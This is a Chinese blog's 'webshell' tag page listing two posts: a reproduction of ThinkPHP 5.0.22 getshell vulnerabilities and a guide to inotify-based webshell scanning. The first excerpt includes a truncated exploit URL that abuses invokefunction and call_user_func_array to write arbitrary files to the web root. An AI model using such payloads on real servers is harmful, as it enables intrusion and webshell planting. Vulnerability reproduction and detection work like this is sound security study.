标签 webshell 下的文章

两个thinkphp_5.0.22的getshell漏洞复现

从官方下载thinkphp_5.0.22_with_extend.zip完整包部署,漏洞一(路由逻辑)复现:在默认(没开启强制路由)的情况下,可轻易向WEB目录写入任意文件。http://192.168.137.3/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_...

一步一重天 2019 年 02 月 17 日 暂无评论

linux(inotify)目录实时监控和对并触发对新增修改的文件进行webshell扫描

下载安装 inotifywget http://github.com/downloads/rvoicilas/inotify-tools/inotify-tools-3.14.tar.gz tar -zxvf inotify-tools-3.14.tar.gz cd inotify-tools-3.14 ./configure --prefix=/usr/local/inotify make...

一步一重天 2018 年 01 月 17 日 暂无评论